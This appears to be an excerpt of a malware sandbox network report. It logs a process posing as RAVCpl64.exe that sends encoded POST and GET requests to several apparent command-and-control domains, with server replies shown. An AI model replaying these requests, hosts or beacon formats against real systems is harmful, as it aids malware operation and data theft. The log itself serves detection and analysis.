                                                                            Data Ascii: utYCiLP6zrcbSyR1EsNsIAnERGApbpcp0Nmp1U6W2JyaBcTdyHV8fsHX1LasBI+706xI47dUv7yQo40siRgOxhhjDLgD2vwfAYQoE4ETicVsBQrIo5A7+En3hwUxRQK4CQITgWxEIivul6yeLRZXovDfGn+DX+9xuSk0i+1mjXzvl3ejHisLavFndgfN911DLJhZz4e26IIoq3sKLO4qByKn6JXTSZ1Hi1DKrkIZAUIzNVucHXv
                                                                            Dec 3, 2024 18:56:13.278017044 CET | 871 | IN | HTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:56:13 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248573.2895854; expires=Fri, 01-Dec-2034 17:56:13 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            20 | 192.168.11.20 | 49769 | 103.224.182.242 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:56:15.799074888 CET | 484 | OUT | GET /3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:15.996423960 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:56:15 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248575.4712803; expires=Fri, 01-Dec-2034 17:56:15 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-length: 1457
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close
                                                                            Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http: [TRUNCATED]
                                                                            Dec 3, 2024 18:56:15.996474028 CET | 440 | IN
                                                                            Data Ascii: .madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs&fp=-3'>Click here to enter</a></div><noscript><meta http-equiv="refresh" content="0; URL=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            21 | 192.168.11.20 | 49770 | 149.88.81.190 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:56:22.293411970 CET | 749 | OUT | POST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=9i9IKJ/Yinkpdc3/0rRj5DlfDUOFrnOmKMaE28B/DjC8GrQiWlJtFpeVikDHSgmAmcujMIg2khNEggYD1jVcoQ8tks71ctl7LiFirDjxnE9QEMSFRFT6Yd1dPUsM5FUmQvhCtGVrJZrNTlKSjFJKBNTFf79np5Nm//D2uyceFqDi4C1fpiXIIcs3hEDctxTSnQ==
                                                                            Dec 3, 2024 18:56:22.625554085 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:22 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            22 | 192.168.11.20 | 49771 | 149.88.81.190 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:56:25.169666052 CET | 769 | OUT | POST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRW8GPAiXgltLJeVoEDCPwmbmcjcMKE2khZEghID1w9foA8v8c7zYtl7LiFirHKWnCVQF4WFQkT9R91eZEsMylUqQvgntHYOJcvNTnCSiQ9VKNTfb78Tqodq577inDE8Cr7e5U4F0QjsLPwFl060vzSJ6c+fOJd6uYcu82e3su/pTOo=
                                                                            Dec 3, 2024 18:56:25.509771109 CET  691                IN         HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:25 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                            23          192.168.11.20  49772        149.88.81.190   80                7608  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:56:28.041656017 CET  1289               OUT        POST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:28.041711092 CET  5156               OUT
                                                                            Data Ascii: KKP0EHSGSPKQzkzPKyMuI6BIdxqF+TwUUpSR2e/iNxqYNc+71q3chZSvLuxj4dlop/hbYaL9ROTmVZ052c/gcYMzrizxeZiItpuAttNlCieG+zAKB9YhZOOoXohe1ZlC1W00jxMhaJDjpGELz0FZu/q/gM0ODjTX4jUsd94lvzEQYnaQ/jef4BY869yFD2lpXJlLfKM1vJdwijPhlB8r+asOa8oQMQMfP2TcwPma5QCRrJa1eK5
                                                                            Dec 3, 2024 18:56:28.041753054 CET  1473               OUT
                                                                            Data Ascii: lZ6Qr64k8D2ArdCkTE0vjFWyw4hL50WmtdFSAjrxm55U6PyOreEHc5fH73xWceOAuuOG3Fldmvbabf16+KudvIINNutiaKCtdJ+FgekluTISTxx2fr27TgAQRUAuJXWJ1j09dMCsrtCkRXBFCCk6bgVSHuvLXsSdq+n5U9uY0K+zBfCQXHSbfZ1W7t8x1Z/Usj2VXGQhobq5oQ5+iROdNVH4MhZzwHtBHRV9p5pyf0dznFyDn93
                                                                            Dec 3, 2024 18:56:28.379411936 CET  691                IN         HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:28 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                            24          192.168.11.20  49773        149.88.81.190   80                7608  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:56:30.903491020 CET  484                OUT        GET /hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:31.244235039 CET  691                IN         HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:31 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                            25          192.168.11.20  49774        101.35.209.183  80                7608  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:56:37.284750938 CET  758                OUT        POST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefq5i5BRjZSgOTuk5x530mc8/7nQjJkNOfbw==
                                                                            Dec 3, 2024 18:56:37.626771927 CET  427                IN         HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:56:37 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                            26          192.168.11.20  49775        101.35.209.183  80                7608  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:56:40.160304070 CET  778                OUT        POST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfvjJjgahmPPEG4auEroCy/5/3MjqaAKtSKc=
                                                                            Dec 3, 2024 18:56:40.509767056 CET  427                IN         HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:56:40 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                            27          192.168.11.20  49776        101.35.209.183  80                7608  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:56:43.033647060 CET  2578               OUT        POST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:43.033720016 CET  5349               OUT
                                                                            Data Ascii: hx5ldvTjjc97jdrgqNi/1irUr6c2zAw58C7wJdcynk74u+kKH/iGJCik/SpVXqS1DJxg4bgbr89iZ9Xvc3q1SJo6MTvNgsk76IauEVFKvA3MJCwg6CIDrj28tbryfEVpZBgNR27NAm4msjX7t5C6yOJ2XTuCSmPMsSV8uVeiPplI2chkwBCgQNRv0TT6FU7YJz8JTQn2/yimQhfa01/uH5Ledl7PuQbyNNEPqXOiwqUykc432zD
                                                                            Dec 3, 2024 18:56:43.382917881 CET  427                IN         HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:56:43 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                            28          192.168.11.20  49777        101.35.209.183  80                7608  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:56:45.905855894 CET  487                OUT        GET /31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:46.253573895 CET  427                IN         HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:56:46 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49778 | 38.47.232.202 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:56:52.088087082 CET | 746 | OUT | POST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA7KqDDvJNW08B0jd8LOZm0kAzG8w7MOko1g==
Dec 3, 2024 18:56:52.441274881 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:52 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 49779 | 38.47.232.202 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:56:54.974092007 CET | 766 | OUT | POST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33cBCMJTOMlzol6fN6Plu2SFII8uGVjo9Xc=
Dec 3, 2024 18:56:55.327203989 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.11.20 | 49780 | 38.47.232.202 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:56:57.858030081 CET | 2578 | OUT | POST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:56:57.858108997 CET | 5337 | OUT |
                                                                            Data Ascii: LSQPhbWp9otu+aYGHHwt9MQ5RSvTeFRtdfpqqKXSzC3QODvbu+Ecad5kB/Bog4JfbEc4OpVcJrpMF2YPzO/Kd/HX/nItIOGIGVYH9C/x2Kt2BTiVac/cG6VcVyX7HJB/oKG29o24u2Lf6cajeHp22yZC+HY6v96K+jhsFqKoN59SoTEPVkmZgF+2RZcz3IiV60Mq0TBxul6LT95qMlh4x75wHg+GMwW1SD0JNrkGlVbXqilhMgI
Dec 3, 2024 18:56:58.206913948 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.11.20 | 49781 | 38.47.232.202 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:57:00.735588074 CET | 483 | OUT | GET /p3j6/?2O=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:57:01.088193893 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:57:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.11.20 | 49782 | 208.91.197.39 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:57:06.579806089 CET | 746 | OUT | POST /hxi5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.jcsa.info
                                                                            Origin: http://www.jcsa.info
                                                                            Referer: http://www.jcsa.info/hxi5/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6SF8jPM3M+T2YCIPFWG1IXKuRcoUmJWLjDA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.11.20 | 49783 | 208.91.197.39 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:57:09.255850077 CET | 766 | OUT | POST /hxi5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.jcsa.info
                                                                            Origin: http://www.jcsa.info
                                                                            Referer: http://www.jcsa.info/hxi5/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
